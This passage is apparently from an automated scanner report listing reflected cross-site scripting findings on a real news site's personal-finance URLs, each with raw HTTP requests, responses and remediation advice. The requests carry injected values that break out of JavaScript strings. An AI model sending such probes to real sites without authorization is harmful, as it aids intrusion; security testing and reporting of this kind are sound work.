Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance84eb2'%3b2bb55a25061/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43309


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance84eb2';2bb55a25061/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance84eb2';2bb55a25061;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13558922?">
...[SNIP]...

1.245. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1558b'%3bef88a93e159 was submitted in the REST URL parameter 1. This input was echoed as 1558b';ef88a93e159 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance1558b'%3bef88a93e159/Christmas+hardest+time+sell+best+time/3995600/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 80706
Expires: Sun, 19 Dec 2010 03:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance1558b';ef88a93e159/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance1558b';ef88a93e159;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34922104?">
...[SNIP]...

1.246. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74102'%3b83caa696128 was submitted in the REST URL parameter 3. This input was echoed as 74102';83caa696128 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Christmas+hardest+time+sell+best+time/399560074102'%3b83caa696128/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70553
Expires: Sun, 19 Dec 2010 03:11:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/christmas-hardest-time-sell-best-time/399560074102';83caa696128/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=christmas-hardest-time-sell-best-time;kw=399560074102';83caa696128;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+su
...[SNIP]...

1.247. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6b22'%3b240f9e32f57 was submitted in the REST URL parameter 4. This input was echoed as a6b22';240f9e32f57 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Christmas+hardest+time+sell+best+time/3995600/a6b22'%3b240f9e32f57 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44637


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/christmas%20hardest%20time%20sell%20best%20time/3995600/a6b22';240f9e32f57/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=christmas%20hardest%20time%20sell%20best%20time;kw=3995600;kw=a6b22';240f9e32f57;kw=npo;kw=fpo;tile='+dartad_tile+';'+
...[SNIP]...

1.248. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820b5'%3be19f1fa9fd was submitted in the REST URL parameter 1. This input was echoed as 820b5';e19f1fa9fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance820b5'%3be19f1fa9fd/Does+diabetes+qualify+disability+credit/3994512/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79835
Expires: Sun, 19 Dec 2010 03:10:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance820b5';e19f1fa9fd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance820b5';e19f1fa9fd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24161567?">
...[SNIP]...

1.249. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce248'%3bd1f8406fe84 was submitted in the REST URL parameter 3. This input was echoed as ce248';d1f8406fe84 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Does+diabetes+qualify+disability+credit/3994512ce248'%3bd1f8406fe84/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71495
Expires: Sun, 19 Dec 2010 03:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/does-diabetes-qualify-disability-credit/3994512ce248';d1f8406fe84/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=does-diabetes-qualify-disability-credit;kw=3994512ce248';d1f8406fe84;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+
...[SNIP]...

1.250. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa5eb'%3b0000bb3f5a6 was submitted in the REST URL parameter 4. This input was echoed as aa5eb';0000bb3f5a6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Does+diabetes+qualify+disability+credit/3994512/aa5eb'%3b0000bb3f5a6 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44637


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/does%20diabetes%20qualify%20disability%20credit/3994512/aa5eb';0000bb3f5a6/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=does%20diabetes%20qualify%20disability%20credit;kw=3994512;kw=aa5eb';0000bb3f5a6;kw=npo;kw=fpo;tile='+dartad_tile+';'+
...[SNIP]...

1.251. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca37c'%3bd9a5baaf693 was submitted in the REST URL parameter 1. This input was echoed as ca37c';d9a5baaf693 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-financeca37c'%3bd9a5baaf693/Elderly+brain+makes+riskier+investments/3983726/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81437
Expires: Sun, 19 Dec 2010 03:11:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financeca37c';d9a5baaf693/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financeca37c';d9a5baaf693;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32472151?">
...[SNIP]...

1.252. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 565bd'%3b35fb979a5ac was submitted in the REST URL parameter 3. This input was echoed as 565bd';35fb979a5ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726565bd'%3b35fb979a5ac/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64674
Expires: Sun, 19 Dec 2010 03:11:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/elderly-brain-makes-riskier-investments/3983726565bd';35fb979a5ac/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=elderly-brain-makes-riskier-investments;kw=3983726565bd';35fb979a5ac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+
...[SNIP]...

1.253. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a48af'%3b7e65cea9d7b was submitted in the REST URL parameter 4. This input was echoed as a48af';7e65cea9d7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726/a48af'%3b7e65cea9d7b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38793


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/elderly%20brain%20makes%20riskier%20investments/3983726/a48af';7e65cea9d7b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=elderly%20brain%20makes%20riskier%20investments;kw=3983726;kw=a48af';7e65cea9d7b;kw=npo;kw=fpo;tile='+dartad_tile+';'+
...[SNIP]...

1.254. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Retired+forgotten/3953088/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3bd2'%3b4a915ea03ce was submitted in the REST URL parameter 1. This input was echoed as a3bd2';4a915ea03ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-financea3bd2'%3b4a915ea03ce/Retired+forgotten/3953088/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83722
Expires: Sun, 19 Dec 2010 03:10:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financea3bd2';4a915ea03ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financea3bd2';4a915ea03ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34415371?">
...[SNIP]...

1.255. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Retired+forgotten/3953088/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55b32'%3b7da1471c85e was submitted in the REST URL parameter 3. This input was echoed as 55b32';7da1471c85e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Retired+forgotten/395308855b32'%3b7da1471c85e/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69813
Expires: Sun, 19 Dec 2010 03:11:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/retired-forgotten/395308855b32';7da1471c85e/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=retired-forgotten;kw=395308855b32';7da1471c85e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70920
...[SNIP]...

1.256. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Retired+forgotten/3953088/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4833e'%3bb4e5a632b37 was submitted in the REST URL parameter 4. This input was echoed as 4833e';b4e5a632b37 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Retired+forgotten/3953088/4833e'%3bb4e5a632b37 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
